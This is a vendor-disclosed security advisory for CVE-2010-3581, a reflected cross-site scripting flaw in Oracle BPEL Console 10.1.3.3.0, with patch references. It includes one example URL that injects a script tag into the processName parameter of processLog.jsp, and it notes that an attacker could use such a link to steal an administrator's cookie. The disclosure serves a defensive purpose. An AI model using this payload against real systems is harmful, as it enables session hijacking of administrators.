Oracle BPEL Console 10.1.3.3.0 Cross Site Scripting

Related Vulnerabilities: CVE-2010-3581  
Publish Date: 28 Oct 2010
                							

                
Digital Security Research Group [DSecRG] Advisory    #DSECRG-09-032



Application:                    Oracle BPEL Console  version 10.1.3.3.0   
Versions Affected:              Oracle BPEL Console  version 10.1.3.3.0   
Vendor URL:                     http://www.oracle.com
Bugs:                           XSS
Exploits:                       YES
Reported:                       18.03.2009
Vendor response:                19.03.2009
Date of Public Advisory:        20.10.2010   
CVE:                            CVE-2010-3581   
Description:                    XSS IN BPELCONSOLE/DEFAULT/processLog.jsp 
Author:                         Alexandr Polyakov
                                Digital Security Reasearch Group [DSecRG] (research [at] dsecrg [dot] com)


Description
***********

Linked XSS vulnerability found in  BPEL module of Oracle Application Server   


Details
*******


Linked XSS vulnerability found in BPEL module.
Wulnerable page BPELConsole/default/processLog.jsp
Attacker can inject XSS by appending it to URL.



Example
*******

http://[localhost]:7777/BPELConsole/default/processLog.jsp?processId=*&revisionTag=*&processName=ssssssssssssssssssss"><script>alert()</script>&eventType=all&eventDate=all



Attacker must send injected link to administrator and get adminiatrators cookie.



Fix Information
***************


Information was published in CPU October 2010.
All customers can download CPU patches following instructions from: 

http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html


Credits
*******

Oracle gives thanks to Alexander Polyakov from Digital Security Company in CPU October 2010.

http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html

Current advisory:

http://dsecrg.com/pages/vul/show.php?id=132



About
*****

Digital Security is one of the leading IT security companies in CEMEA,
providing information security consulting, audit and penetration
testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.
Digital Security Research Group focuses on enterprise application (ERP) and database
security problems with vulnerability reports, advisories and whitepapers
posted regularly on our website.

Contact: research [at] dsecrg [dot]com
http://www.dsecrg.com
http://www.erpscan.com











Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
______________________
DIGITAL SECURITY
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polyakov@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected 
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure 
is strictly prohibited. If you have received this message in error, please notify the sender immediately 
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence 
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding 
statements by e-mail unless otherwise agreed. 
-----------------------------------      
<p>